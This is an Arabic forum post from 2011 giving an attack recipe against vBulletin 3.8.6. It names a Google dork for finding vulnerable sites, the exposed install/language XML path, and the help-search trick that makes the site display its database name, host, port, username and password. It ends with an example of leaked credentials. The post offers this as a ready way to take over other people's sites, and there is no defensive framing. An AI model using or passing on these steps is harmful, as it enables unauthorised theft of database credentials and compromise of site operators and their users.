عرض مشاركة واحدة
قديم 01-16-2011, 09:13 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
DR-HEX
 
الصورة الرمزية DR-HEX
 

 

 
إحصائية العضو





DR-HEX غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DR-HEX is on a distinguished road

.... ثغرة powered by vBulletin 3.8.6


[align=center]
الشرح
Google dork : powered by vBulletin 3.8.6
بعد ما تلقى موقع فيه هذا الاصدار المصاب ضيف له هذا المسار
/install/vbulletin-language.xml

مثال:www.xxx.com/vb/install/vbulletin-language.mxl
لو مو ظهر لك ملف فيه أكواد يعني تم ترقيع الثغرة
وبعد ما يفتح الملف قم بالبحث بالضغط على ctrl+f
عن كلمة:
"data****_ingo"
(اذا تعذر الحصول على الكلمة فعلم انه تم ترقيع الثغرة)
واذا ظهرت بيظهرو لك معلومات config كانك داخل ملف الــconfig

مثال: اقتباس:
<phrase name="data****_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Data**** Name: {$vbulletin->config['Data****']['dbname']}<br />
Data**** Host: {$vbulletin->config['MasterServer']['servername']}<br />
Data**** Port: {$vbulletin->config['MasterServer']['port']}<br />
Data**** Username: {$vbulletin->config['MasterServer']['username']}<br />
Data**** Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
وبعده نروح الموقع المصاب و نضغط ( تعليمات ),( تعليمات ) ثم نعمل بحث عن كلمة
Data**** أو data****

ونضغط على النتائج و بعده نحول اللغة للانجليزية

وبيظهرو لك المعلومات كامله..

مثال:
اقتباس:
Data**** Name: pro_aXXXXXXXXXg_com

Data**** Host: localhost

Data**** Port: 3306

Data**** Username: pro_aXXXXXXXXXg
Data**** Password: gitl0st

تحياتي
***272;***342;-***1085;***1105;***1174;
[/align]




eyvm powered by vBulletin 3>8>6

التوقيع

{ فَمَنِ اعْتَدَى عَلَيْكُمْ فَاعْتَدُوا عَلَيْهِ بِمِثْلِ مَا اعْتَدَى عَلَيْكُمْ }

صدق الله العظيم

 

   

رد مع اقتباس